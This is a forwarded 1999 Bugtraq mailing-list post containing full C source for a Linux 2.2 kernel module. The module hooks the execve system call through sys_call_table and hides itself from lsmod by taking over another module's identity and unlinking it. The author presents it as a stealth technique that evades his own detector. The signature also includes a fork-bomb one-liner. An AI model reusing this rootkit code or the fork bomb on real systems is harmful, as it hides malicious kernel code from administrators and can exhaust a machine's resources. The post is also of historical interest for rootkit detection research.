Subject:      [EuroHaCk] stealth-code (fwd)
To: BUGTRAQ@SECURITYFOCUS.COM 


---------- Forwarded message ----------
Date: Wed, 18 Aug 1999 18:56:09 +0200
From: Martin Markovitz <stealth@dione.ids.pl>
Reply-To: eurohack@bofh.kyrnet.kg
To: coders@dione.ids.pl
Subject: [EuroHaCk] stealth-code




hi,


don't think that hiding modules is an old topic. ;-)
since all the other dirty tricks didn't work on 2.2
kernel (as using asm-code etc.) i used new
techniqe to hide modules. example-code below.
payload is simly print-out-message-at-execution-call
thingie.
this module even is stealth enuff ;-) for my radar.c
module-detector.
any other suggestions are welcome.


cheers,
Stealth




: ---- main(){fork();main();} ----
: Hi! I'm a .signature virus! Copy me into your ~/.signature, please!
: Stealth <-> http://www.kalug.lug.net/stealth


/*** A kernel-module for 2.2 kernels, hiding itself.
 *** It was easier in 2.0 kernels and i found all the old
 *** techniqes not to work. So i invented new one. ;-)
 *** (C) 1999/2000 by Stealth.
 *** All under the GPL. SO YOU USE IT AT YOUR OWN RISK.
 *** http://www.kalug.lug.net/stealth
 ***
 *** Greets to all my friends, you know who you are.
 ***/
#define __KERNEL__
#define MODULE
#include <linux/module.h>
#include <linux/kernel.h>
#include <sys/syscall.h>
#include <linux/unistd.h>
#include <linux/sched.h>
#include <asm/uaccess.h>
#include <linux/mm.h>
#include <linux/smp_lock.h>
#ifndef NULL
#define NULL ((void*)0)
#endif


extern void *sys_call_table[];
int (*old_exec)(struct pt_regs regs);


int new_exec(struct pt_regs regs)
{
        int error = 0;
        char *filename;


        lock_kernel();
        filename = getname((char*)regs.ebx);
        error =  PTR_ERR(filename);
        if (IS_ERR(error))
                goto out;


        printk("Hi, the hook is still installed. ;-)\n");
        error = do_execve(filename, (char**)regs.ecx, (char**)regs.edx, &regs);
        putname(filename);
out:
        unlock_kernel();
        return error;
}



int init_module()
{
        int i = 0;
        struct module *m = &__this_module, *lastm = NULL,
                      *to_delete = NULL;
        
        EXPORT_NO_SYMBOLS;


        /* install hook */
        old_exec = sys_call_table[__NR_execve];
        sys_call_table[__NR_execve] = new_exec;


        /* get next module-struct */
        to_delete = m->next;
        if (!to_delete) {
                printk("No module found for exchange }|-(\n");
                return 0;
        }


        /* and steal all information about it */
        m->name = to_delete->name;
        m->size = to_delete->size;
        m->flags = to_delete->flags;
        
        /* even set the right USE_COUNT */
        for (i = 0; i < GET_USE_COUNT(to_delete); i++)  
                MOD_INC_USE_COUNT;
        
        /* and drop the attacked module from the list
         * this won't delete it but makes it disapear for lsmod
         */
        m->next = to_delete->next;


        printk("The following modules are visible now:\n");
        while (m) {
                printk("%s\n", m->name);
                m = m->next;
        }
        printk("Tzzz... (sleeping)\n");
        return 0;
}


int cleanup_module()
{
        sys_call_table[__NR_execve] = old_exec;
        return 0;
}